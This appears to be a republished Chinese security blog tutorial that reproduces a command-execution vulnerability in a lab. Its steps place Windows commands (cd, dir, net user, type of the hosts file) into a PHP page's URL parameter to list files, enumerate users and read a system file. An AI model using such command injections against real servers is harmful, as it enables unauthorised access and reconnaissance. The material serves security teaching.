文章总结： 该文档演示了系统命令执行漏洞的复现过程，旨在掌握其成因与利用方法。实验基于Win10攻击机与Apache靶机，通过在URL参数中拼接cd、dir、netuser等指令，成功执行系统命令并获取路径、文件列表、用户信息及敏感文件内容。该内容展示了漏洞利用的基本步骤与危害，属于基础安全实验教程。 综合评分： 58 文章分类： 漏洞分析,WEB安全,渗透测试

高危漏洞&系统命令执行复现

原创

建哥聊安全 建哥聊安全

建哥聊安全

2026年3月11日 08:40 湖南

系统命令执行漏洞利用之执行操作系统命令

实验目的

通过本实验，掌握命令执行漏洞产生的原因和利用方法，体验命令执行漏洞的利用过程。

实验环境

·操作机：Win10 用户名：Administrator 密码：Sangfor!7890

·靶机：Apache + PHP

·实验地址：http://ip/os/system.php

实验原理

利用系统命令执行漏洞可以执行一些操作系统命令，从而获取重要信息。

实验步骤

1、登录”Attack”操作机，打开浏览器，访问http://ip/os/system.php

2、在URL后拼接”?a=cd”，访问http://ip/os/system.php?a=cd，执行代码，查看当前文件的绝对路径

3、在URL后拼接”?a=dir”，访问http://ip/os/system.php?a=dir，执行代码，查看当前目录下的所有文件

4、在URL后拼接”?a=net user”，访问http://ip/os/system.php?a=net user，执行代码，查看所有用户

5、在URL后拼接”?a=type c:\windows\system32\drivers\etc\hosts”，访问http://ip/os/system.php?a=type c:\windows\system32\drivers\etc\hosts，执行代码，查看hosts文件

实验总结

通过本实验，掌握系统命令执行漏洞的利用，通过系统命令执行漏洞，执行操作系统的相关命令，获取重要信息。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全 建哥聊安全 建哥聊安全《高危漏洞&系统命令执行复现》